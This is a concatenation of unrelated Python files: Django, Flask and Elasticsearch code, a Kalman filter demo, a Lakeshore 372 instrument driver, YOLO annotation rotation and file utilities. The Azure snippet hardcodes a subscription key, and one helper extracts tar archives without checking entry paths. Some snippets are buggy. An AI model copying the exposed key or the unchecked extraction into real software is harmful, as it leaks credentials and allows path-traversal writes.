operations = [
migrations.RenameField(
model_name='category',
old_name='title',
new_name='titlec',
),
]
|
from elasticsearch import Elasticsearch
import json
if __name__ == "__main__":
app_name_set = set()
es_client = Elasticsearch(['localhost:9200'])
index='topic'
response = es_client.search(
index='topic',
body={
"size": 2900,
"query": {
"match_all": {
}
},"_source":["title","summary","forum_title"]
},
scroll='1h'
)
scroll_id = response['_scroll_id']
total = 0
while scroll_id:
count = len(response['hits']['hits'])
if count<=0:
break
total+=count
print(total)
bulk_docs = []
for hits in response['hits']['hits']:
source = hits['_source']
doc_id = int(hits['_id'])
data= {}
data['id'] = doc_id
title = source.get('title','')
summary = source.get('summary','')
forum_title = source.get('forum_title',"")
            if forum_title is None:
                print(source)
                print(doc_id)
                forum_title = ''  # avoid a TypeError in the concatenations below
forum_title_concat_title = forum_title + " "+title
forum_title_concat_title = forum_title_concat_title.lower()
data['title_init'] = forum_title_concat_title
data['title_not_analyzed'] = forum_title_concat_title
data['title_smart'] = forum_title_concat_title
data['title_max'] = forum_title_concat_title
data['title_std'] = title
forum_title_concat_summary = forum_title + " "+summary
forum_title_concat_summary = forum_title_concat_summary.lower()
data['summary_init'] = forum_title_concat_summary
data['summary_not_analyzed'] = forum_title_concat_summary
data['summary_smart'] = forum_title_concat_summary
data['summary_max'] = forum_title_concat_summary
data['summary_std'] = summary
index_doc={}
index_doc['update'] = {
'_index': index,
'_type': '_doc',
'_id': doc_id
}
doc_values ={"doc": data}
bulk_docs.append(index_doc)
bulk_docs.append(doc_values)
if len(bulk_docs) > 0:
            es_client.bulk(bulk_docs, index=index, doc_type='_doc')
response = es_client.scroll(scroll_id=scroll_id, scroll='1h')
scroll_id = response['_scroll_id']
|
import matplotlib.pyplot as plt
from numpy import *
from random import random
class kalman(object):
def __init__(self, x0, p0, a, b, c, vv, vw):
self.x_ = 0 # A priori estimate state
self.x = x0 # A posteriori estimate state
self.p_ = 0 # A priori error covariance matrix
self.p = p0 # A posteriori error covariance matrix
self.a = a # Transition model
self.b = b #
self.c = c # Observation model
self.g = 0 # Kalman gain
self.vv = vv # Variance of process noise
self.vw = vw # Variance of observation noise
def predict(self):
self.x_ = self.a * self.x
self.p_ = self.a * self.p * self.a.T + self.vv * self.b * self.b.T
def update(self, y):
self.g = (self.p_ * self.c) / (self.c.T * self.p_ * self.c + self.vw)
self.x = self.x_ + self.g * (y - self.c.T * self.x_)
self.p = (1 - self.g * self.c.T) * self.p_
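    # The two methods above implement the standard scalar Kalman recursion:
    #   predict: x_ = a*x,               p_ = a*p*a + vv*b*b
    #   update:  g = p_*c / (c*p_*c + vw)
    #            x = x_ + g*(y - c*x_),  p = (1 - g*c)*p_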
if __name__ == "__main__":
x0 = 0.
p0 = 0.
a = array(1)
b = array(1)
c = array(1)
vv = 1.
vw = 5.
k = kalman(x0, p0, a, b, c, vv, vw)
n = 300
T = 2*pi
s = []
r = []
rk = []
t = arange(0., T, T/n)
for i in t:
k.predict()
# True value
x = 20. * sin(i) + sqrt(vv) *2*(random()-0.5)
s.append(x)
# Observation value
y = x + sqrt(vw) * 2*(random()-0.5)
k.update(y)
r.append(y)
# Estimate value
rk.append(k.x)
fig, ax = plt.subplots()
plt.xlabel("Time")
plt.ylabel("Amplitude")
plt.title("Simulation result")
ms = 2
ax.plot(t, s, color='g', linestyle='--', marker='+', markersize=ms, label='True value')
ax.plot(t, r, color='r', linestyle=':', marker=',', markersize=ms, label='Observation value')
ax.plot(t, rk, color='b', linestyle='-', marker='.', markersize=ms, label='Estimate value')
legend = ax.legend(loc='upper right', shadow=True)
frame = legend.get_frame()
plt.show()
|
from django.shortcuts import render
from .models import Informaciones
from django.views import generic
# Create your views here.
class InformacioneListView(generic.ListView):
model = Informaciones
template_name='Naruto.html'
context_object_name='Informaciones_list'
|
#!/usr/bin/python3
import pytest
import os
import urllib
# from .app import app as myapp
from .helpers import Vocabulary, FileManager, EpithetGenerator
from flask import Flask
from flask_testing import LiveServerTestCase
from unittest.mock import patch
dir_path = os.path.abspath("../../resources")
path_json = os.path.join(dir_path, "data.json")
path_csv = os.path.join(dir_path, "data.csv")
ext_path = os.path.join(dir_path, 'data')
class Test_file_manager:
"""test the file manager"""
file = FileManager()
def test_get_ext(self):
        assert self.file.get_extension(ext_path) in ('json', 'csv')
def test_read_json(self):
assert self.file.read_json(path_json)
class Test_vocab:
"""test the vocab dict"""
data = Vocabulary()
def test_from_file(self):
assert self.data.from_file(path_json)
def test_from_json(self):
assert self.data.from_json(path_json)
class TestEpithet:
"""test the epithet generator"""
test_epithet = EpithetGenerator()
def test_vocab_data(self):
assert self.test_epithet.vocab_data(path_json)
class TestFlask:
"""test flask connections and json data"""
def test_json_data_index(self, client):
res = client.get('/')
        assert res.status_code == 200
assert res.json is not None
assert res.json['epithet'] is not None
assert len(res.json['epithet']) == 1
def test_vocab_json(self, client):
res = client.get('/vocabulary')
        assert res.status_code == 200
assert res.json is not None
assert res.json['vocabulary'] is not None
@patch("random.randint", return_value=3)
    def test_random_epithet(self, mock_randint, client):
        res = client.get('/epithet')
        assert res.status_code == 200
assert res.json['epithets'] is not None
assert len(res.json['epithets']) == 3
    def test_num_epithets(self, client):
        res = client.get('/epithet/10')
        assert res.status_code == 200
assert res.json['epithets'] is not None
assert len(res.json['epithets']) == 10
|
from __future__ import division
#encoding:utf-8
import pandas as pd
import numpy as np
'''
Purpose: compute the four evaluation metrics commonly used in regression analysis.
'''
from sklearn.metrics import explained_variance_score, mean_absolute_error, median_absolute_error, r2_score
def calPerformance(y_true,y_pred):
    '''
    Evaluate model performance.
    y_true: ground-truth values
    y_pred: values predicted by the regression model
    mean_absolute_error: Mean Absolute Error (MAE); measures how close the
        predictions are to the true data, and the smaller the value, the
        better the fit.
    explained_variance_score: explained-variance score of the regression
        model, in the range [0, 1]; the closer to 1, the better the
        independent variables explain the variance of the dependent
        variable, and smaller values mean a worse fit.
    r2_score: coefficient of determination; also an explained-variance
        score in the range [0, 1], where values closer to 1 are better and
        smaller values mean a worse fit.
    '''
model_metrics_name=[mean_absolute_error, median_absolute_error,explained_variance_score, r2_score]
tmp_list=[]
for one in model_metrics_name:
tmp_score=one(y_true,y_pred)
tmp_list.append(tmp_score)
print(['mean_absolute_error','median_absolute_error','explained_variance_score','r2_score'])
print(tmp_list)
return tmp_list
if __name__=='__main__':
    inputfile = './datasave/new_reg_data_GM11_revenue.csv'  # input data file
data = pd.read_csv(inputfile)
data.drop(data[np.isnan(data['y'])].index, inplace=True)
y_pred = data['y_pred']
y_true = data['y']
calPerformance(y_true,y_pred)
|
#!/usr/bin/python
from os import getenv
from datetime import datetime, timedelta
from time import mktime
from email.Utils import formatdate
steps = ('Start', 'Next', 'Even further', 'End')
path_info = getenv('PATH_INFO', '')
if len(path_info) >= 2 and path_info[0] == '/':
step = int(path_info[1:])
else:
step = 0
now = datetime.now()
expires = now + timedelta(days=1)
expires = mktime(expires.timetuple())
print "Content-Type: text/html"
print "Expires: %s" % formatdate(timeval=expires, localtime=False, usegmt=True)
print
print "<div style='border:1px solid black;'><table width=100% border><tr>"
for i in range(len(steps)):
label = steps[i]
if i == step:
print "<td><b>%s</b></td>" % label
else:
print "<td><a c:base='widget' c:mode='focus' href='%d'>%s</a></td>" % (i, label)
print "</tr></table>"
if step == 0:
print "Willkommen beim Wizard!"
elif step == 1:
print "<c:widget type='demo_date2_http'/>"
elif step == 2:
print "<c:widget type='demo_hello'/>"
elif step == 3:
print "Ende."
else:
print "Fehler."
print "</div>"
|
from azure.cognitiveservices.language.textanalytics import TextAnalyticsClient
from msrest.authentication import CognitiveServicesCredentials
subscription_key = "cced4caa372c41deac94a069a20212f2"
endpoint = "https://kardel2.cognitiveservices.azure.com/"
credentials = CognitiveServicesCredentials(subscription_key)
text_analytics = TextAnalyticsClient(endpoint=endpoint, credentials=credentials)
documents = [
{
"id": "1",
"language": "en",
"text": "@Breaking911 Build that wall!! 👍"
}
]
response = text_analytics.entities(documents=documents)
for document in response.documents:
print("Document Id: ", document.id)
print("\tKey Entities:")
for entity in document.entities:
print("\t\t", "NAME: ", entity.name, "\tType: ",
entity.type, "\tSub-type: ", entity.sub_type)
for match in entity.matches:
print("\t\t\tOffset: ", match.offset, "\tLength: ", match.length, "\tScore: ",
"{:.2f}".format(match.entity_type_score))
|
"""
Crie um programa que receba uma lista de inteiros e depois receba mais um inteiro f
após isso, mova todos os valores f da lista original para o final da lista.
Exemplo
Entrada Saída
[1, 2, 1, 4, 5, 1, 9], 1 [2, 4, 5, 9, 1, 1, 1]
"""
lista = []
index = 5
ocorrencias=0
cont = 0
for i in range(index):
item = int(input("Digite o valor a ser adicionado na lista: "))
lista.append(item)
final = int(input("Digite o valor a ser movido para o final: "))
while cont<index:
if lista[cont]==final:
lista.pop(cont)
ocorrencias+=1
cont-=1
index-=1
cont+=1
for i in range(ocorrencias):
lista.append(final)
print(lista)
|
# Generated by Django 2.2.3 on 2019-07-18 10:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("robbit", "0005_image_faves")]
operations = [
migrations.AlterField(
model_name="image",
name="faves",
field=models.PositiveIntegerField(db_index=True),
)
]
|
#Given envelopes = [[5,4],[6,4],[6,7],[2,3]],
#the maximum number of envelopes you can Russian doll is 3 ([2,3] => [5,4] => [6,7]).
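# A minimal sketch of one common approach (not part of the original file):
# sort by width ascending and height descending, then the answer is the
# length of the longest strictly increasing subsequence of heights.
import bisect
def max_envelopes(envelopes):
    envelopes.sort(key=lambda e: (e[0], -e[1]))
    tails = []  # tails[i] = smallest tail height of an increasing run of length i+1
    for _, h in envelopes:
        i = bisect.bisect_left(tails, h)
        if i == len(tails):
            tails.append(h)
        else:
            tails[i] = h
    return len(tails)
# max_envelopes([[5, 4], [6, 4], [6, 7], [2, 3]]) -> 3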
|
#coding=utf-8
import zipfile
from . import main
from flask import render_template, redirect, url_for,request,jsonify,Response
from ..models.Photo import Photo
from ..models.Album import Album
# from config import ALLOWED_FILE
# allowed_files = ['jpg','png','zip','rar']
def filetype(filename):
return '.' in filename and filename.rsplit('.',1)[1]
@main.route('/')
def index():
    # home page
    # pagination parameters
page = int(request.args.get('page',0))
count = int(request.args.get('count',1))
# imgs = Photo.objects[(page-1)*count:page*count]
imgs = Photo.objects
imgs = [i.to_dict() for i in imgs]
return render_template('home.html',imgs=imgs)
@main.route('/img/<id>')
def img(id):
    # serve a single image
photo = Photo.objects.get(id=id)
img = photo.img.read()
res = Response(img,mimetype="image/jpeg")
return res
@main.route('/album')
def album():
    # album page
return render_template('album.html')
@main.route('/upload',methods=['GET','POST'])
def upload():
    # upload a photo or a zip archive
album_name = ''
file = request.files['file']
filename = file.filename
if file:
if filetype(filename) in ['zip','rar','ZIP','RAR']:
            # archive file
            z = zipfile.ZipFile(file,'r')
            for i in z.namelist():
                img_name = i
                if filetype(img_name) in ['png','jpg']:
                    # check whether the archived file is an image
                    img = z.read(i)
                    Photo(img_name=img_name,img=img).save()
            return jsonify({'msg': 'Archive uploaded successfully', 'type': 'success'})
        elif filetype(filename) in ['png','jpg','jpeg','PNG','JPG','JPEG']:
            # image file
            Photo(album_name=album_name,img=file).save()
            return jsonify({'msg': 'Image uploaded successfully', 'type': 'success'})
        else:
            return jsonify({'msg': 'Upload failed', 'type': 'error'})
@main.route('/api/new-album',methods=['GET','POST'])
def new_album():
    # create a new album
name = request.form.get('name')
try:
album = Album.objects.get(name=name)
if album:
            return jsonify({'msg': 'Album already exists', 'type': 'error'})
except:
pass
Album(name=name).save()
    return jsonify({'msg': 'Album created successfully', 'type': 'success'})
@main.route('/api/albums',methods=['GET','POST'])
def albums():
    # fetch all album info
albums = Album.objects()
data = [i.to_dict() for i in albums]
return jsonify(data)
|
from typing import Dict, ClassVar
from qcodes.instrument_drivers.Lakeshore.lakeshore_base import (
LakeshoreBase, BaseOutput, BaseSensorChannel)
from qcodes.instrument.group_parameter import GroupParameter, Group
import qcodes.utils.validators as vals
# There are 16 sensors channels (a.k.a. measurement inputs) in Model 372
_n_channels = 16
class Output_372(BaseOutput):
"""Class for control outputs (heaters) of model 372"""
MODES: ClassVar[Dict[str, int]] = {
'off': 0,
'monitor_out': 1,
'open_loop': 2,
'zone': 3,
'still': 4,
'closed_loop': 5,
'warm_up': 6}
POLARITIES: ClassVar[Dict[str, int]] = {
'unipolar': 0,
'bipolar': 1}
RANGES: ClassVar[Dict[str, int]] = {
'off': 0,
'31.6μA': 1,
'100μA': 2,
'316μA': 3,
'1mA': 4,
'3.16mA': 5,
'10mA': 6,
'31.6mA': 7,
'100mA': 8}
def __init__(self, parent, output_name, output_index) -> None:
super().__init__(parent, output_name, output_index, has_pid=True)
self.input_channel.vals = vals.Numbers(1, _n_channels)
# Add more parameters for OUTMODE command
# and redefine the corresponding group
self.add_parameter('polarity',
label='Output polarity',
docstring='Specifies output polarity (not '
'applicable to warm-up heater)',
val_mapping=self.POLARITIES,
parameter_class=GroupParameter)
self.add_parameter('use_filter',
label='Use filter for readings',
docstring='Specifies controlling on unfiltered or '
'filtered readings',
val_mapping={True: 1, False: 0},
parameter_class=GroupParameter)
self.add_parameter('delay',
label='Delay',
unit='s',
docstring='Delay in seconds for setpoint change '
'during Autoscanning',
vals=vals.Ints(0, 255),
get_parser=int,
parameter_class=GroupParameter)
self.output_group = Group([self.mode, self.input_channel,
self.powerup_enable, self.polarity,
self.use_filter, self.delay],
set_cmd=f'OUTMODE {output_index}, {{mode}}, '
f'{{input_channel}}, '
f'{{powerup_enable}}, {{polarity}}, '
f'{{use_filter}}, {{delay}}',
get_cmd=f'OUTMODE? {output_index}')
self.P.vals = vals.Numbers(0.0, 1000)
self.I.vals = vals.Numbers(0.0, 10000)
self.D.vals = vals.Numbers(0, 2500)
class Model_372_Channel(BaseSensorChannel):
SENSOR_STATUSES = {0: 'OK',
1: 'CS OVL',
2: 'VCM OVL',
4: 'VMIX OVL',
8: 'VDIF OVL',
16: 'R. OVER',
32: 'R. UNDER',
64: 'T. OVER',
128: 'T. UNDER'}
def __init__(self, parent, name, channel):
super().__init__(parent, name, channel)
# Parameters related to Input Channel Parameter Command (INSET)
self.add_parameter('enabled',
label='Enabled',
docstring='Specifies whether the input/channel is '
'enabled or disabled. At least one '
'measurement input channel must be '
'enabled. If all are configured to '
'disabled, channel 1 will change to '
'enabled.',
val_mapping={True: 1, False: 0},
parameter_class=GroupParameter)
self.add_parameter('dwell',
label='Dwell',
docstring='Specifies a value for the autoscanning '
'dwell time.',
unit='s',
get_parser=int,
vals=vals.Numbers(1, 200),
parameter_class=GroupParameter)
self.add_parameter('pause',
label='Change pause time',
docstring='Specifies a value for '
'the change pause time',
unit='s',
get_parser=int,
vals=vals.Numbers(3, 200),
parameter_class=GroupParameter)
self.add_parameter('curve_number',
label='Curve',
docstring='Specifies which curve the channel uses: '
'0 = no curve, 1 to 59 = standard/user '
'curves. Do not change this parameter '
'unless you know what you are doing.',
get_parser=int,
vals=vals.Numbers(0, 59),
parameter_class=GroupParameter)
self.add_parameter('temperature_coefficient',
label='Change pause time',
docstring='Sets the temperature coefficient that '
'will be used for temperature control if '
'no curve is selected (negative or '
'positive). Do not change this parameter '
'unless you know what you are doing.',
val_mapping={'negative': 1, 'positive': 2},
parameter_class=GroupParameter)
self.output_group = Group([self.enabled, self.dwell, self.pause,
self.curve_number,
self.temperature_coefficient],
set_cmd=f'INSET {self._channel}, '
f'{{enabled}}, {{dwell}}, {{pause}}, '
f'{{curve_number}}, '
f'{{temperature_coefficient}}',
get_cmd=f'INSET? {self._channel}')
# Parameters related to Input Setup Command (INTYPE)
self.add_parameter('excitation_mode',
label='Excitation mode',
docstring='Specifies excitation mode',
val_mapping={'voltage': 0, 'current': 1},
parameter_class=GroupParameter)
# The allowed values for this parameter change based on the value of
# the 'excitation_mode' parameter. Moreover, there is a table in the
# manual that assigns the numbers to particular voltage/current ranges.
# Once this parameter is heavily used, it can be implemented properly
# (i.e. using val_mapping, and that val_mapping is updated based on the
# value of 'excitation_mode'). At the moment, this parameter is added
# only because it is a part of a group.
self.add_parameter('excitation_range_number',
label='Excitation range number',
docstring='Specifies excitation range number '
'(1-12 for voltage excitation, 1-22 for '
'current excitation); refer to the manual '
'for the table of ranges',
get_parser=int,
vals=vals.Numbers(1, 22),
parameter_class=GroupParameter)
self.add_parameter('auto_range',
label='Auto range',
docstring='Specifies auto range setting',
val_mapping={'off': 0, 'current': 1},
parameter_class=GroupParameter)
self.add_parameter('range',
label='Range',
val_mapping={'2.0 mOhm': 1,
'6.32 mOhm': 2,
'20.0 mOhm': 3,
'63.2 mOhm': 4,
'200 mOhm': 5,
'632 mOhm': 6,
'2.00 Ohm': 7,
'6.32 Ohm': 8,
'20.0 Ohm': 9,
'63.2 Ohm': 10,
'200 Ohm': 11,
'632 Ohm': 12,
'2.00 kOhm': 13,
'6.32 kOhm': 14,
'20.0 kOhm': 15,
'63.2 kOhm': 16,
'200 kOhm': 17,
'632 kOhm': 18,
'2.0 MOhm': 19,
'6.32 MOhm': 20,
'20.0 MOhm': 21,
'63.2 MOhm': 22},
parameter_class=GroupParameter)
self.add_parameter('current_source_shunted',
label='Current source shunt',
docstring='Current source either not shunted '
'(excitation on), or shunted '
'(excitation off)',
val_mapping={False: 0, True: 1},
parameter_class=GroupParameter)
self.add_parameter('units',
label='Preferred units',
docstring='Specifies the preferred units parameter '
'for sensor readings and for the control '
'setpoint (kelvin or ohms)',
val_mapping={'kelvin': 1, 'ohms': 2},
parameter_class=GroupParameter)
self.output_group = Group([self.excitation_mode,
self.excitation_range_number,
self.auto_range, self.range,
self.current_source_shunted, self.units],
set_cmd=f'INTYPE {self._channel}, '
f'{{excitation_mode}}, '
f'{{excitation_range_number}}, '
f'{{auto_range}}, {{range}}, '
f'{{current_source_shunted}}, '
f'{{units}}',
get_cmd=f'INTYPE? {self._channel}')
class Model_372(LakeshoreBase):
"""
Lakeshore Model 372 Temperature Controller Driver
Note that interaction with the control input (referred to as 'A' in the
Computer Interface Operation section of the manual) is not implemented.
"""
channel_name_command: Dict[str, str] = {'ch{:02}'.format(i): str(i)
for i in range(1, 1 + _n_channels)}
CHANNEL_CLASS = Model_372_Channel
def __init__(self, name: str, address: str, **kwargs) -> None:
super().__init__(name, address, **kwargs)
        self.sample_heater = Output_372(self, 'sample_heater', 0)
self.warmup_heater = Output_372(self, 'warmup_heater', 1)
self.analog_heater = Output_372(self, 'analog_heater', 2)
if __name__ == "__main__":
Instrument.close_all()
# with logger.console_level(logging.DEBUG):
#     LS370 = Model_372(name='LS370 input Ch', address='GPIB::12::INSTR', terminator='\n')
#     print(LS370.ch08.temperature.get())
LS370 = Model_372(name='LS370 input Ch', address='GPIB::12::INSTR', terminator='\n')
print(LS370.ch08.temperature.get())
# print(LS370.write('*RST'))
# LS370OPT = Output_372(LS370, 'sample_heater', 0)
# print(LS370OPT.polarity.get())
|
def quicksort(a, l, r):
    if l >= r:
        return
    mid = partition(a, l, r)
    quicksort(a, l, mid - 1)
    quicksort(a, mid + 1, r)

def partition(a, l, r):
    # Lomuto partition around the pivot a[l]
    x = a[l]
    j = l
    for i in range(l + 1, r + 1):
        if a[i] <= x:
            j += 1
            a[i], a[j] = a[j], a[i]
    a[l], a[j] = a[j], a[l]
    return j

if __name__ == '__main__':
    numbers = list(map(int, input().split()))
    quicksort(numbers, 0, len(numbers) - 1)
    print(*numbers)
|
x = float(input("x= "))
# Note: the original condition `x/0 == 0` always raises ZeroDivisionError;
# assuming the intent was simply "x is even and non-negative".
if (x % 2 == 0) and (x >= 0):
    x = 1
    print("f(x): ", x)
elif x < 0:
    x = 0
    print("f(x): ", x)
else:
    x = -1
    print("f(x): ", x)
|
# -*- coding: utf-8 -*-
# $ pip install opencv-python
# $ pip install pillow
# Python3
# Usage: $ Python yolo-img-rotate-del_exif_windows.py image_folder
#
import sys
import cv2
import glob
import numpy as np
from PIL import Image, ImageOps
from PIL.ExifTags import TAGS
import shutil
import os
from os import listdir, getcwd
from os.path import join
# Affine transform of the bounding box
def convert_coordinate(box, size, deg):
print("start convert_rotate function:")
x = box[0]
y = box[1]
w = size[0]
h = size[1]
print("deg =", deg)
print("x =", x)
print("y =", y)
print("w =", w)
print("h =", h)
if deg == '0':
print("deg = 0")
x2 = x
y2 = y
w2 = w
h2 = h
elif deg == '90':
print("deg = 90")
x2 = 1 - y
y2 = x
w2 = h
h2 = w
elif deg == '180':
print("deg = 180")
x2 = 1 - x
y2 = 1 - y
w2 = w
h2 = h
elif deg == '270':
print("deg = 270")
x2 = y
y2 = 1 - x
w2 = h
h2 = w
else:
print("deg = else")
x2 = x
y2 = y
w2 = w
h2 = h
print("deg =", deg)
print("x2 =", x2)
print("y2 =", y2)
print("w2 =", w2)
print("h2 =", h2)
return (x2, y2, w2 ,h2)
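# A quick sanity check of convert_coordinate (illustrative, not part of the
# original script): with YOLO-normalized coordinates, a box centred at
# (0.25, 0.50) rotated by 90 degrees should move to (0.50, 0.25) with its
# width and height swapped.
def _demo_convert_coordinate():
    x2, y2, w2, h2 = convert_coordinate((0.25, 0.50), (0.10, 0.20), '90')
    assert (x2, y2, w2, h2) == (0.50, 0.25, 0.20, 0.10)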
# Rotate the image and save it under a new file name
def rotate_img(fname, deg):
    img = Image.open(fname)
    # Convert to a counter-clockwise angle (PIL rotates counter-clockwise)
    deg2 = 360 - int(deg)
    img_rotate = img.rotate(deg2, expand=True, resample=Image.BICUBIC)
    # Split the file name and extension
    name_base, name_ext = os.path.splitext(fname)
    # print(name_base)
    # Save under the modified file name
    img_rotate.save(name_base + '-' + str(deg) + '.jpg')
    print(name_base + '-' + str(deg) + '.jpg' + ' is saved.')
# Extract the Exif data from an image
def get_exif_of_image(file):
    im = Image.open(file)
    # Get the Exif data; if it does not exist, return an empty dict
    try:
        exif = im._getexif()
        # Raw tag IDs are not human-readable, so decode them
        # and store them in a table
        exif_table = {}
        for tag_id, value in exif.items():
            tag = TAGS.get(tag_id, tag_id)
            exif_table[tag] = value
    except AttributeError:
        print(" no Exif data found")
        return {}
    print(" exif-orientation: {0}".format(exif_table.get('Orientation')))
    return exif_table
# From the Orientation value in the Exif table, get the rotation angle
# and whether the image needs to be mirrored
def get_exif_rotation(orientation_num):
    """
    return rotation angle, whether to mirror (0 or 1)
    # Reference: https://qiita.com/minodisk/items/b7bab1b3f351f72d534b
    """
    if orientation_num == 1:
        return 0, 0
    if orientation_num == 2:
        return 0, 1
    if orientation_num == 3:  # the original image is rotated 180 degrees clockwise
        return 180, 0
    if orientation_num == 4:
        return 180, 1
    if orientation_num == 5:
        return 270, 1
    if orientation_num == 6:  # the original image is rotated 90 degrees clockwise
        return 270, 0
    if orientation_num == 7:
        return 90, 1
    if orientation_num == 8:  # the original image is rotated 270 degrees clockwise
        return 90, 0
    return 0, 0  # unknown orientation: leave the image as-is
# Use the Exif info to rotate the image and save it under a new file name
def rotate_exif_info(path, to_path):
    print(" Func: rotate_exif_info() is called.")
    # to_save_path = to_path + os.path.sep + os.path.basename(path)
    to_save_path = to_path + '/' + os.path.basename(path)
    if os.path.exists(to_path) is False:
        os.makedirs(to_path)
    exif = get_exif_of_image(path)
    rotate = 0
    reverse = 0
    if 'Orientation' in exif:
        rotate, reverse = get_exif_rotation(exif['Orientation'])
    img = Image.open(path)
    data = img.getdata()
    mode = img.mode
    size = img.size
    with Image.new(mode, size) as dst:
        dst.putdata(data)
        if reverse == 1:
            dst = ImageOps.mirror(dst)
        if rotate != 0:
            dst = dst.rotate(rotate, expand=True)
        dst.save(to_save_path)
# Main
def main():
    # Get the image folder name from argument 1
    args = sys.argv
    if len(args) != 2:
        print("Usage: $ python " + args[0] + " image_folder")
        quit()
    folder_name = args[1]
    print("Folder name (args[1]) is %s" % folder_name)
    # List the existing image files (*.jpg)
    for file_name in glob.glob('./%s/*.jpg' % folder_name):
        print("File name is %s" % file_name)
        dir_name = os.path.splitext(os.path.dirname(file_name))[0]
        print(" dir_name: %s" % dir_name)
        base_name = os.path.splitext(os.path.basename(file_name))[0]
        print(" base_name: %s" % base_name)
    # <1> Rotation
    print("<1> Start rotation:")
    # List the existing image files (*.jpg)
    for file_name in glob.glob('./%s/*.jpg' % folder_name):
        print("File name is %s" % file_name)
        # 0-degree rotation (called only to strip the Exif data)
        rotate_img(file_name, 0)
        '''
        # 90-degree rotation (clockwise, to match Ralph)
        rotate_img(file_name, 90)
        # 180-degree rotation (clockwise, to match Ralph)
        rotate_img(file_name, 180)
        # 270-degree rotation (clockwise, to match Ralph)
        rotate_img(file_name, 270)
        '''
    # <2> Generate the annotation files
    print("<2> Start annotation:")
    # List the existing annotation files (*.txt)
    for file_name in glob.glob('./%s/*.txt' % folder_name):
        print("File name is %s" % file_name)
        # Split the file name and extension
        name_base, name_ext = os.path.splitext(file_name)
        print(" name_base: %s" % name_base)
        print(" name_ext: %s" % name_ext)
        base_name = os.path.splitext(os.path.basename(file_name))[0]
        print(" base_name: %s" % base_name)
        # Process the annotation one line at a time
        for line in open(file_name, 'r'):
            print("Label name is %s" % file_name)
            print("Image name is %s" % file_name.replace(".txt", ".jpg"))
            # Get the image size
            img = cv2.imread(file_name.replace(".txt", ".jpg"),
                             cv2.IMREAD_IGNORE_ORIENTATION | cv2.IMREAD_COLOR)
            #
            # OpenCV docs, imread():
            # If EXIF information is embedded in the image file,
            # the EXIF orientation will be taken into account
            # and thus the image will be rotated accordingly,
            # except if the flag IMREAD_IGNORE_ORIENTATION is passed.
            #
            # ImreadModes:
            # IMREAD_IGNORE_ORIENTATION: If set, do not rotate the image according to EXIF's orientation flag.
            h, w = img.shape[:2]
            print("h =", h)
            print("w =", w)
            # Extract the class number and coordinates
            l = line.split(" ")
            print(l[0])  # class number
            print(l[1])  # bounding-box x coordinate
            print(l[2])  # bounding-box y coordinate
            print(l[3])  # bounding-box width w
            print(l[4])  # bounding-box height h
            # Convert strings to numbers
            bbox = (int(l[0]), float(l[1]), float(l[2]), float(l[3]), float(l[4]))
            class_num = bbox[0]
            x = bbox[1]
            y = bbox[2]
            w = bbox[3]
            h = bbox[4]
            # Rotate + translate the coordinates (affine transform)
            # degs = ['0', '90', '180', '270']
            degs = ['0']
            for deg in degs:
                # Transform
                bbox2 = convert_coordinate((x, y), (w, h), deg)
                print(str(class_num), " ".join([str(a) for a in bbox2]))
                print(".")
                # Append the angle to the same base name and save
                # name_base, name_ext = os.path.splitext(file_name)
                # list_write_file = open(name_base + '-' + deg + '.txt', 'a', newline="\n")
                with open(name_base + '-' + deg + '.txt', 'a', newline='\n') as list_write_file:
                    list_write_file.write(str(class_num) + " " + " ".join([str(a) for a in bbox2]) + "\n")
        # Move the original image (a 0-degree copy was created above, so
        # keeping the original here would duplicate it)
        backup_dir = folder_name + '/backup'
        if not os.path.exists(backup_dir):
            os.makedirs(backup_dir)
        print("Moving the original image to ./backup")
        from_file_jpg = name_base + '.jpg'  # file_name
        from_file_txt = name_base + '.txt'
        to_file_jpg = backup_dir + '/' + base_name + '.jpg'
        to_file_txt = backup_dir + '/' + base_name + '.txt'
        shutil.move(from_file_jpg, to_file_jpg)
        shutil.move(from_file_txt, to_file_txt)
if __name__ == '__main__':
main()
print("Done!")
|
import io
import os
import tarfile
import errno
import json
import zipfile
import os.path as osp
import numpy as np
import pandas as pd
from tensorflow.keras.utils import get_file
__all__ = [
'download_file', 'files_exist', 'makedirs', 'makedirs_from_filepath',
'extractall', 'remove', 'load_npz', 'read_csv', 'read_json',
]
def download_file(raw_paths, urls):
if isinstance(raw_paths, str):
raw_paths = (raw_paths, )
if isinstance(urls, str):
urls = (urls, )
assert len(raw_paths) == len(urls)
exceptions = []
for filename, url in zip(raw_paths, urls):
if not osp.exists(filename):
try:
get_file(filename, origin=url, extract=False)
except Exception as e:
exceptions.append(e)
print(f"Downloading failed: {url}")
if exceptions:
raise exceptions[0]
def extractall(filename, folder=None):
    """Extracts a zip or tar.gz (tgz) archive to a specific folder.
    Parameters:
    -----------
    filename (string): The path to the archive (or a list of paths).
    folder (string): The destination folder. Defaults to the directory
        containing the archive.
    """
if not filename:
return
if isinstance(filename, (list, tuple)):
for f in filename:
extractall(f, folder)
return
if folder is None:
folder = osp.dirname(osp.realpath(osp.expanduser(filename)))
if filename.endswith(".zip"):
with zipfile.ZipFile(filename, 'r') as f:
f.extractall(folder)
if filename.endswith(".tgz") or filename.endswith(".tar.gz"):
tar = tarfile.open(filename, "r:gz")
tar.extractall(path=folder)
tar.close()
def remove(filepaths):
if isinstance(filepaths, str):
filepaths = (filepaths, )
for path in filepaths:
if osp.exists(path):
os.unlink(path)
def files_exist(files) -> bool:
if not files:
return False
if isinstance(files, (list, tuple)):
return len(files) != 0 and all([osp.exists(f) for f in files])
else:
return osp.exists(files)
def makedirs(path: str):
    try:
        os.makedirs(osp.expanduser(osp.normpath(path)), exist_ok=True)
    except OSError as e:
        # re-raise unless the directory already exists
        if e.errno != errno.EEXIST or not osp.isdir(path):
            raise e
def makedirs_from_filepath(filepath: str, verbose: bool = True):
folder = osp.dirname(osp.realpath(osp.expanduser(filepath)))
makedirs(folder)
def load_npz(filepath):
filepath = osp.abspath(osp.expanduser(filepath))
if not filepath.endswith('.npz'):
filepath = filepath + '.npz'
if osp.isfile(filepath):
with np.load(filepath, allow_pickle=True) as loader:
loader = dict(loader)
for k, v in loader.items():
if v.dtype.kind in {'O', 'U'}:
loader[k] = v.tolist()
return loader
else:
raise ValueError(f"{filepath} doesn't exist.")
def read_csv(reader, dtype=np.int32):
if isinstance(reader, str):
reader = osp.abspath(osp.expanduser(reader))
else:
reader = io.BytesIO(reader)
return pd.read_csv(reader,
encoding="utf8",
sep=",",
dtype={"switch": dtype})
def read_json(filepath):
with open(filepath, "r", encoding="utf-8") as f:
data = json.load(f)
return data
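# Minimal usage sketch of the helpers above (the file name and URL are
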